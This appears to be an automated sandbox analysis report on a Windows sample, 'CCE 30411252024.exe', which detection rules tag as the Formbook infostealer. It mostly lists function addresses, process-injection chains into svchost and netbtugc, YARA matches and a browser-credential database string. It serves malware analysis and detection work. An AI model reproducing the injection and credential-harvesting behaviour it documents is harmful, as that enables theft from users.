            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F6BD72_2_035F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA802_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035569622_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360A9A62_2_0360A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A02_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354A8402_2_0354A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035428402_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E8F02_2_0356E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035268B82_2_035268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4F402_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560F302_2_03560F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03582F282_2_03582F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532FC82_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354CFE02_2_0354CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BEFA02_2_035BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540E592_2_03540E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FEE262_2_035FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FEEDB2_2_035FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552E902_2_03552E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FCE932_2_035FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354AD002_2_0354AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353ADE02_2_0353ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03558DBF2_2_03558DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540C002_2_03540C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530CF22_2_03530CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0CB52_2_035E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352D34C2_2_0352D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F132D2_2_035F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0358739A2_2_0358739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355B2C02_2_0355B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E12ED2_2_035E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035452A02_2_035452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360B16B2_2_0360B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352F1722_2_0352F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357516C2_2_0357516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354B1B02_2_0354B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EF0CC2_2_035EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035470C02_2_035470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F70E92_2_035F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FF0E02_2_035FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FF7B02_2_035FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F16CC2_2_035F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F75712_2_035F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DD5B02_2_035DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035314602_2_03531460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FF43F2_2_035FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFB762_2_035FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B5BF02_2_035B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357DBF92_2_0357DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355FB802_2_0355FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFA492_2_035FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F7A462_2_035F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B3A6C2_2_035B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EDAC62_2_035EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DDAAC2_2_035DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03585AA02_2_03585AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035499502_2_03549950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355B9502_2_0355B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D59102_2_035D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AD8002_2_035AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035438E02_2_035438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFF092_2_035FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03541F922_2_03541F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFFB12_2_035FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03549EB02_2_03549EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F1D5A2_2_035F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03543D402_2_03543D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F7D732_2_035F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355FDC02_2_0355FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B9C322_2_035B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FFCF22_2_035FFCF2
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02E92AE15_2_02E92AE1
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02E94AAF5_2_02E94AAF
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02E92B2F5_2_02E92B2F
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02EB208F5_2_02EB208F
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02E9488F5_2_02E9488F
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02E948865_2_02E94886
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02E9B1AD5_2_02E9B1AD
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeCode function: 5_2_02E9B1AF5_2_02E9B1AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326A3526_2_0326A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032703E66_2_032703E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031BE3F06_2_031BE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032502746_2_03250274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032302C06_2_032302C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031A01006_2_031A0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0324A1186_2_0324A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032381586_2_03238158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032701AA6_2_032701AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032681CC6_2_032681CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032420006_2_03242000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031D47506_2_031D4750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031B07706_2_031B0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031AC7C06_2_031AC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031CC6E06_2_031CC6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031B05356_2_031B0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032705916_2_03270591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032624466_2_03262446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0325E4F66_2_0325E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326AB406_2_0326AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03266BD76_2_03266BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031AEA806_2_031AEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031C69626_2_031C6962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0327A9A66_2_0327A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031B29A06_2_031B29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031BA8406_2_031BA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031B28406_2_031B2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031968B86_2_031968B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031DE8F06_2_031DE8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03252F306_2_03252F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031D0F306_2_031D0F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031F2F286_2_031F2F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03224F406_2_03224F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0322EFA06_2_0322EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031A2FC86_2_031A2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031BCFE06_2_031BCFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326EE266_2_0326EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031B0E596_2_031B0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031C2E906_2_031C2E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326CE936_2_0326CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326EEDB6_2_0326EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031BAD006_2_031BAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0324CD1F6_2_0324CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031C8DBF6_2_031C8DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031AADE06_2_031AADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031B0C006_2_031B0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03250CB56_2_03250CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031A0CF26_2_031A0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326132D6_2_0326132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0319D34C6_2_0319D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031F739A6_2_031F739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031B52A06_2_031B52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032512ED6_2_032512ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031CB2C06_2_031CB2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0327B16B6_2_0327B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0319F1726_2_0319F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031E516C6_2_031E516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031BB1B06_2_031BB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326F0E06_2_0326F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032670E96_2_032670E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031B70C06_2_031B70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0325F0CC6_2_0325F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326F7B06_2_0326F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032616CC6_2_032616CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032675716_2_03267571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0324D5B06_2_0324D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326F43F6_2_0326F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031A14606_2_031A1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326FB766_2_0326FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031CFB806_2_031CFB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03225BF06_2_03225BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031EDBF96_2_031EDBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03223A6C6_2_03223A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03267A466_2_03267A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326FA496_2_0326FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03251AA36_2_03251AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0324DAAC6_2_0324DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031F5AA06_2_031F5AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0325DAC66_2_0325DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032459106_2_03245910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031B99506_2_031B9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031CB9506_2_031CB950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0321D8006_2_0321D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031B38E06_2_031B38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326FF096_2_0326FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031B1F926_2_031B1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326FFB16_2_0326FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031B9EB06_2_031B9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03267D736_2_03267D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031B3D406_2_031B3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03261D5A6_2_03261D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_031CFDC06_2_031CFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03229C326_2_03229C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0326FCF26_2_0326FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_005315E06_2_005315E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_005330F06_2_005330F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_005330EE6_2_005330EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0052C7D06_2_0052C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0052C7C76_2_0052C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0052C9F06_2_0052C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0052AA706_2_0052AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00549FD06_2_00549FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00D8A0AF6_2_00D8A0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00D8B8B46_2_00D8B8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00D8B9D66_2_00D8B9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00D8ADD86_2_00D8ADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_00D8BD6C6_2_00D8BD6C
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: String function: 00F0F8A0 appears 35 times
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: String function: 00EFEC2F appears 68 times
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: String function: 00F06AC0 appears 42 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03587E54 appears 100 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0352B970 appears 275 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03575130 appears 56 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035BF290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0321EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 031F7E54 appears 102 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 031E5130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0322F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0319B970 appears 275 times
            Source: CCE 30411252024.exe, 00000000.00000003.2159355416.0000000003B7D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CCE 30411252024.exe
            Source: CCE 30411252024.exe, 00000000.00000003.2157797690.0000000003983000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CCE 30411252024.exe
            Source: CCE 30411252024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@16/7
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2CE7A GetLastError,FormatMessageW,0_2_00F2CE7A
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F1AB84 AdjustTokenPrivileges,CloseHandle,0_2_00F1AB84
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F1B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00F1B134
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00F2E1FD
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F26532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00F26532
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F3C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00F3C18C
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EE406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00EE406B
            Source: C:\Users\user\Desktop\CCE 30411252024.exeFile created: C:\Users\user\AppData\Local\Temp\autECA6.tmpJump to behavior
            Source: CCE 30411252024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000006.00000003.2517694990.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2520094357.0000000000A0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: CCE 30411252024.exeReversingLabs: Detection: 73%
            Source: unknownProcess created: C:\Users\user\Desktop\CCE 30411252024.exe "C:\Users\user\Desktop\CCE 30411252024.exe"
            Source: C:\Users\user\Desktop\CCE 30411252024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CCE 30411252024.exe"
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\CCE 30411252024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CCE 30411252024.exe"Jump to behavior
